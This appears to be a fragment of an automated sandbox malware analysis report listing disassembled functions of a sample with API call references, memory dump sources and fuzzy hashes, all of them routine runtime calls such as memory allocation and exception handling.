                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                          • String ID:
                                                          • API String ID: 2621100827-0
                                                          • Opcode ID: 6c4c2cf70b95fe0a064540668f035bd3059e61625cbb857faa3ba386a6d48e76
                                                          • Instruction ID: d24e6b42c33be03a13c41e8f53740757cba2b3d78a885cbd1ed0357afc49fe01
                                                          • Opcode Fuzzy Hash: 6c4c2cf70b95fe0a064540668f035bd3059e61625cbb857faa3ba386a6d48e76
                                                          • Instruction Fuzzy Hash: 45516CB1A0064AAFC704CFA9D980A89FBF4FF08304F14866EE519D7B50D771EA14CBA1
                                                          Function 6CF6DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$Init
                                                          • String ID:
                                                          • API String ID: 3740757921-0
                                                          • Opcode ID: 5f2957cb90e316bc1daefb24bd845aa6efe1397436ec27fce3b1590779a31fab
                                                          • Instruction ID: ecc16a9d1518316da06c16d1378cccd4c244bad1550ca21c0423d2b6af54497e
                                                          • Opcode Fuzzy Hash: 5f2957cb90e316bc1daefb24bd845aa6efe1397436ec27fce3b1590779a31fab
                                                          • Instruction Fuzzy Hash: 884179726082419FD700DF2AC840B9AB7F8FF99714F148A6AF9549BB50D731E805CB92
                                                          Function 6CF75DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF75E87
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF75E9C
                                                          • std::exception::exception.LIBCMT ref: 6CF75EAB
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF75EC0
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                          • String ID:
                                                          • API String ID: 2621100827-0
                                                          • Opcode ID: b21c05c5ccf2bafa684fc261eac3b31e62a4311070be5610e08acfc4a70e36fd
                                                          • Instruction ID: 0c8bcc7b0d4ce098125f0589ba445b433a8b5a605d3ddf8cfcb40b33767d90ef
                                                          • Opcode Fuzzy Hash: b21c05c5ccf2bafa684fc261eac3b31e62a4311070be5610e08acfc4a70e36fd
                                                          • Instruction Fuzzy Hash: 58414BB19007489FC720CF69D580A9ABBF4FB18304F44896ED45AA7B41D771EA08CBA1
                                                          Function 6CF6D360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF6D437
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6D44C
                                                          • std::exception::exception.LIBCMT ref: 6CF6D45B
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6D470
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                          • String ID:
                                                          • API String ID: 2621100827-0
                                                          • Opcode ID: cfa8f272c483c6646d8fcf0e887b16906fb028867121c26915577bfaf08ae89f
                                                          • Instruction ID: a7473b800c2a74fdcd91fbbbadd708305a83d5f963ea26530c1039ac883827c4
                                                          • Opcode Fuzzy Hash: cfa8f272c483c6646d8fcf0e887b16906fb028867121c26915577bfaf08ae89f
                                                          • Instruction Fuzzy Hash: E2412BB19007489FC720CF69D580A8ABBF4FF19304F54896ED55AA7B41D771FA08CBA1
                                                          Function 6CFB2B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF86480: __CxxThrowException@8.LIBCMT ref: 6CF86518
                                                            • Part of subcall function 6CF86480: __CxxThrowException@8.LIBCMT ref: 6CF86558
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CFB2C9A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB2CB1
                                                          • std::exception::exception.LIBCMT ref: 6CFB2CC3
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB2CDA
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$std::exception::exception$_malloc
                                                          • String ID:
                                                          • API String ID: 3942750879-0
                                                          • Opcode ID: f63164c68231e9c654653479d668e776a7901d9928c39d22b7ab9e68f319d631
                                                          • Instruction ID: c41cd6c1373588a72f52d7929ee9b207804d9c2c3bb861e55ab31d8349db2457
                                                          • Opcode Fuzzy Hash: f63164c68231e9c654653479d668e776a7901d9928c39d22b7ab9e68f319d631
                                                          • Instruction Fuzzy Hash: 794139B15187419FC314CF59C480A8AFBF4FF99714F508A2EF19A97B50D771A508CB92
                                                          Function 6CF7C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF7C478
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF7C488
                                                          • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CF7C4B4
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7C512
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$DestroyElement
                                                          • String ID:
                                                          • API String ID: 3987547017-0
                                                          • Opcode ID: 9d7c4ad7fd3993c2d549ef4556a86ce1e1e25d94da3d0648dccd7065ed574e71
                                                          • Instruction ID: 1906cf8f040beb110a235d7145ff2a1659f3ba1cda3f016c839db28edfd086b6
                                                          • Opcode Fuzzy Hash: 9d7c4ad7fd3993c2d549ef4556a86ce1e1e25d94da3d0648dccd7065ed574e71
                                                          • Instruction Fuzzy Hash: 6A415371A00149AFDB10DFA8D884EEEBBB8FB49314F10856AF919E7640D731AA45CB60
                                                          Function 6CF7B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(6CFD02A0), ref: 6CF7B5D5
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7B5E2
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7B685
                                                          • VariantClear.OLEAUT32(6CFD02A0), ref: 6CF7B68B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID:
                                                          • API String ID: 2610073882-0
                                                          • Opcode ID: 3721ecf9e447ec4a014457f934dc5697cb43ca52e2d07811b58915c1b0eeb816
                                                          • Instruction ID: 771ccb6874e08734832342a60cbbeff38db7351562177ac49f45759c41469d0d
                                                          • Opcode Fuzzy Hash: 3721ecf9e447ec4a014457f934dc5697cb43ca52e2d07811b58915c1b0eeb816
                                                          • Instruction Fuzzy Hash: DD419372A01209EFDB10DFA9D980B9AF7F9FF89314F24459AE90497350D776E901CBA0
                                                          Function 6CFC88C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CFC88FD
                                                          • __isleadbyte_l.LIBCMT ref: 6CFC8930
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CFC8961
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CFC89CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: b64149ac559df1ef5a510d85f01df4bca7eb0c7e78e0882406b3a9a72443b50a
                                                          • Instruction ID: 9d3eb279aee5b53133160950c0f84f9519c6ac09513fdb29828801c03eb6c1c9
                                                          • Opcode Fuzzy Hash: b64149ac559df1ef5a510d85f01df4bca7eb0c7e78e0882406b3a9a72443b50a
                                                          • Instruction Fuzzy Hash: D831A031B05287EFDB10DFA8C884AAF3BB5BF02314F2545AAE5A49B990D731D940DB52
                                                          Function 6CF55A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF55ACB
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF55AE0
                                                          • std::exception::exception.LIBCMT ref: 6CF55B18
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF55B2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                          • String ID:
                                                          • API String ID: 3153320871-0
                                                          • Opcode ID: d790d93ab3c1dec8e4867ca1f16844f5ffc6ef2b65c0370a9f8ad791831eea2d
                                                          • Instruction ID: 611ab465cb3f63879a4acdc8a847bf17a0cd1783d7c5adaf782fb2a88ea929df
                                                          • Opcode Fuzzy Hash: d790d93ab3c1dec8e4867ca1f16844f5ffc6ef2b65c0370a9f8ad791831eea2d
                                                          • Instruction Fuzzy Hash: 713197B5910608ABCB04DF59D8419DAB7F8FF58740F00C66EE91597B40EB70AA04CBA1
                                                          Function 6CF68470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • InitializeCriticalSection.KERNEL32(00000000,00000000,6CF65D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CF684EA
                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CF684F0
                                                          • std::exception::exception.LIBCMT ref: 6CF6853C
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF68551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3005353045-0
                                                          • Opcode ID: 3b9868e030a1e664b6988ce27a3dc8992b795e3c0624550d58c4a0b5449f70d5
                                                          • Instruction ID: c038f85442ad847cb5d9ad78d44fea7222f6cf332dd996ff4ab03b5e1782d323
                                                          • Opcode Fuzzy Hash: 3b9868e030a1e664b6988ce27a3dc8992b795e3c0624550d58c4a0b5449f70d5
                                                          • Instruction Fuzzy Hash: EB3138B1A01604AFC714CF69C480A9AFBF8FB19210F508A6EE95697B41D771FA44CB90
                                                          Function 6CF7DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::exception::exception.LIBCMT ref: 6CF7DCC5
                                                            • Part of subcall function 6CFB9533: std::exception::_Copy_str.LIBCMT ref: 6CFB954E
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF7DCDA
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF7DD09
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF7DD1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                          • String ID:
                                                          • API String ID: 399550787-0
                                                          • Opcode ID: b5a8c69ab7826f7541c4315c86afb69a592054558cf933aa6c66bb3f3257424b
                                                          • Instruction ID: 3af9590ce2d95a89d925c3842b00624fd85039a48874a1c429ea6624611ab9da
                                                          • Opcode Fuzzy Hash: b5a8c69ab7826f7541c4315c86afb69a592054558cf933aa6c66bb3f3257424b
                                                          • Instruction Fuzzy Hash: 773140B6900209AFD704DF99D841A9EBBF8FF58300F44855EE919A7750DB70EB04CBA1
                                                          Function 6CFC2645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _malloc.LIBCMT ref: 6CFC2653
                                                            • Part of subcall function 6CFB9D66: __FF_MSGBANNER.LIBCMT ref: 6CFB9D7F
                                                            • Part of subcall function 6CFB9D66: __NMSG_WRITE.LIBCMT ref: 6CFB9D86
                                                            • Part of subcall function 6CFB9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CFB9BD4,6CF51290,CA0C7769), ref: 6CFB9DAB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_malloc
                                                          • String ID:
                                                          • API String ID: 501242067-0
                                                          • Opcode ID: 683e36cf9ef90be2788eae496ac015f31a2e74e7e20df457306eb0eea3b7d057
                                                          • Instruction ID: 3dc99a7c23248329c5c98c667c45302512090862bb6bb9af69c3285f14d476b2
                                                          • Opcode Fuzzy Hash: 683e36cf9ef90be2788eae496ac015f31a2e74e7e20df457306eb0eea3b7d057
                                                          • Instruction Fuzzy Hash: 6211C832B052166BCB212B3AE80C78F3BB8EB467A9B241525E444A6B40DF35C540A7A6
                                                          Function 6CF67240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF84410: _malloc.LIBCMT ref: 6CF8446E
                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CF67287
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF6729B
                                                          • _memmove.LIBCMT ref: 6CF672AF
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF672B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
